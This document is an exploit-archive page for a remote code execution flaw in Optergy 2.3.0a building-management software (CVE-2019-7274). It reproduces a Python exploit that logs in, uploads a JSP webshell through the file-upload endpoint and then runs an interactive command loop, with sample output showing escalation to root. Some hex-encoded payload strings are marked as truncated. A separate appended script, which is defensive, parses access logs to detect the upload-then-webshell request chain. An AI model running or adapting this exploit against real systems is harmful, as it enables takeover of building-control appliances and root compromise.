Optergy 2.3.0a remote code execution Vulnerability / Exploit


Exploits / Vulnerability Discovered : 2019-11-12 | Type : webapps | Platform : hardware
This exploit / vulnerability (Optergy 2.3.0a remote code execution) is published for educational purposes only; if you use it, you do so at your own risk.

[+] Code ...

# Title: Optergy 2.3.0a - Remote Code Execution
# Author: LiquidWorm
# Date: 2019-11-05
# Vendor: https://optergy.com/
# Product web page: https://optergy.com/products/
# Affected version: <=2.3.0a
# Advisory: https://applied-risk.com/resources/ar-2019-008
# Paper: https://applied-risk.com/resources/i-own-your-building-management-system
# CVE: CVE-2019-7274

#!/usr/bin/env python
# -*- coding: utf8 -*-
# lqwrm@metalgear:~/stuff/optergy$ python optergy_rfm.py
# [+] Usage: optergy_rfm.py http://IP
# [+] Example: optergy_rfm.py
# lqwrm@metalgear:~/stuff/optergy$ python optergy_rfm.py
# Enter username: podroom
# Enter password: podroom
# Welcome to Optergy HTTP Shell!
# You can navigate to:
# Or you can continue using this 'shell'.
# Type 'exit' for exit.
# root@ id
# uid=1000(optergy) gid=1000(optergy) groups=1000(optergy),4(adm)
# root@ sudo id
# uid=0(root) gid=0(root) groups=0(root)
# root@ rm /usr/local/tomcat/webapps/ROOT/images/jox.jsp
# root@ exit
# Have a nice day!

import requests
import sys,os,time,re

piton = os.path.basename(sys.argv[0])

if len(sys.argv) < 2:
    print "[+] Usage: " + piton + " http://IP"
    print "[+] Example: " + piton + "\n"
    sys.exit()

the_user = raw_input("Enter username: ")
the_pass = raw_input("Enter password: ")
the_host = sys.argv[1]
odi = requests.Session()

# Step 1: authenticate against the AJAX login endpoint so the session cookie is set
the_url = the_host + "/ajax/AjaxLogin.html?login"
the_headers = {"Accept" : "*/*",
               "X-Requested-With" : "XMLHttpRequest",
               "User-Agent" : "Noproblem/16.0",
               "Content-Type" : "application/x-www-form-urlencoded",
               "Accept-Encoding" : "gzip, deflate",
               "Accept-Language" : "en-US,en;q=0.9"}

the_data = {"username" : the_user,
            "password" : the_pass,
            "token" : ''}

odi.post(the_url, headers = the_headers, data = the_data)

# Step 2: upload endpoint, hex-encoded in the original ("/ajax/FileUpload");
# the remainder of this literal is truncated in this listing
the_upl = ("\x2f\x61\x6a\x61\x78\x2f\x46\x69\x6c\x65\x55\x70\x6c\x6f\x61\x64")

the_url = the_host + the_upl
the_headers = {"Cache-Control" : "max-age=0",
               "Content-Type" : "multipart/form-data; boundary=----WebKitFormBoundarysrMvKmQPYUODSWBl",
               "User-Agent" : "Noproblem/16.0",
               "Accept" : "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8",
               "Accept-Encoding" : "gzip, deflate",
               "Accept-Language" : "en-US,en;q=0.9"}

# Multipart request body, hex-encoded in the original ("------WebKitForm...");
# the remainder of this literal is truncated in this listing
the_data = ("\x2d\x2d\x2d\x2d\x2d\x2d\x57\x65\x62\x4b\x69\x74\x46\x6f\x72\x6d")

odi.post(the_url, headers = the_headers, data = the_data)

print "\nWelcome to Optergy HTTP Shell!"
print "You can navigate to: " + the_host + "/images/jox.jsp"
print "Or you can continue using this 'shell'."
print "Type 'exit' for exit.\n"

# Step 3: interactive loop; each command is sent as the 'cmd' parameter to the uploaded JSP
while True:
    try:
        cmd = raw_input("root@" + the_host[7:] + ":~# ")
        if cmd.strip() == "exit":
            print "Have a nice day!"
            break
        paramz = {"cmd" : cmd} # sudo cmd
        shell = requests.get(url = the_host + "/images/jox.jsp", params = paramz)
        regex = re.search(r"BR>(.*?)</pre>", shell.text, flags = re.S)
        print regex.group(1).strip()
    except Exception:
        # handler body is absent from this listing; keep the loop alive on a failed request or parse
        pass
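The request sequence the exploit above relies on (a login POST, a POST to the file-upload endpoint, then GETs to a `.jsp` under the static `/images/` directory carrying a `cmd` parameter) is exactly what a defender can look for in the Tomcat access log. The following Python 3 script is an added example of that detection logic and is not part of the original exploit or of the vendor's product; it assumes a combined-format access log (the exact log layout on an Optergy appliance is an assumption), and the log lines, client addresses and timestamps are constructed for the example.

```python
import re
from datetime import datetime, timedelta

# Combined-format access-log line (assumed format), e.g.
# 10.0.0.5 - - [12/Nov/2019:10:00:03 +0000] "POST /ajax/FileUpload HTTP/1.1" 200 512 "-" "Noproblem/16.0"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) \S+ "[^"]*" "(?P<ua>[^"]*)"$'
)
TS_FMT = "%d/%b/%Y:%H:%M:%S %z"

UPLOAD_PATH = "/ajax/FileUpload"        # upload endpoint used by the exploit above
# any JSP served from the static images directory (should never execute server-side code)
JSP_UNDER_STATIC_RE = re.compile(r"^/images/[^?]*\.jsp(?:\?|$)", re.I)
# a JSP under /images/ invoked with a cmd= query parameter (webshell style)
WEBSHELL_RE = re.compile(r"^/images/[^/?]+\.jsp\?(?:.*&)?cmd=", re.I)

# Constructed sample log: one attacker chain (10.0.0.5), one benign request (10.0.0.7),
# one probe for the shell that was never uploaded (10.0.0.9, answered with 404).
SAMPLE_LOG = """\
10.0.0.5 - - [12/Nov/2019:10:00:01 +0000] "POST /ajax/AjaxLogin.html?login HTTP/1.1" 200 64 "-" "Noproblem/16.0"
10.0.0.5 - - [12/Nov/2019:10:00:03 +0000] "POST /ajax/FileUpload HTTP/1.1" 200 512 "-" "Noproblem/16.0"
10.0.0.5 - - [12/Nov/2019:10:00:09 +0000] "GET /images/jox.jsp?cmd=id HTTP/1.1" 200 220 "-" "python-requests/2.22.0"
10.0.0.5 - - [12/Nov/2019:10:00:15 +0000] "GET /images/jox.jsp?cmd=sudo+id HTTP/1.1" 200 230 "-" "python-requests/2.22.0"
10.0.0.7 - - [12/Nov/2019:10:02:00 +0000] "GET /images/logo.png HTTP/1.1" 200 8912 "-" "Mozilla/5.0"
10.0.0.9 - - [12/Nov/2019:11:30:00 +0000] "GET /images/jox.jsp?cmd=id HTTP/1.1" 404 0 "-" "curl/7.64.1"
"""


def parse_line(line):
    """Parse one access-log line into a dict, or return None if it does not match the format."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["ts"] = datetime.strptime(rec["ts"], TS_FMT)
    return rec


def suspicious_requests(lines):
    """Every request for a JSP under /images/, regardless of outcome (status code included
    so a 404 probe is distinguishable from a served shell)."""
    out = []
    for rec in map(parse_line, lines):
        if rec and JSP_UNDER_STATIC_RE.match(rec["path"]):
            out.append((rec["ip"], rec["path"], rec["status"]))
    return out


def find_webshell_chains(lines, window=timedelta(minutes=30)):
    """Correlate the exploit's two stages per client: a POST to the upload endpoint followed,
    within `window`, by a GET to a JSP under /images/ with a cmd= parameter.
    Returns (client_ip, upload_timestamp, shell_request_path) per correlated command."""
    last_upload = {}   # client ip -> timestamp of its most recent upload POST
    hits = []
    for rec in map(parse_line, lines):
        if rec is None:
            continue
        if rec["method"] == "POST" and rec["path"].startswith(UPLOAD_PATH):
            last_upload[rec["ip"]] = rec["ts"]
        elif rec["method"] == "GET" and WEBSHELL_RE.match(rec["path"]):
            up = last_upload.get(rec["ip"])
            if up is not None and up <= rec["ts"] <= up + window:
                hits.append((rec["ip"], up, rec["path"]))
    return hits


if __name__ == "__main__":
    lines = SAMPLE_LOG.splitlines()
    for ip, path, status in suspicious_requests(lines):
        print("JSP under static dir: %s %s (HTTP %s)" % (ip, path, status))
    for ip, up, path in find_webshell_chains(lines):
        print("upload->command chain: %s uploaded at %s, then %s" % (ip, up.isoformat(), path))
```

The chain rule is the higher-confidence signal, since a benign client has no reason to POST to the upload endpoint and then request a JSP from the images directory; the standalone rule still catches probes for an already-planted shell, and listing a JSP under `/images/` at all is worth an alert on its own, because a static directory should never be executing server-side code.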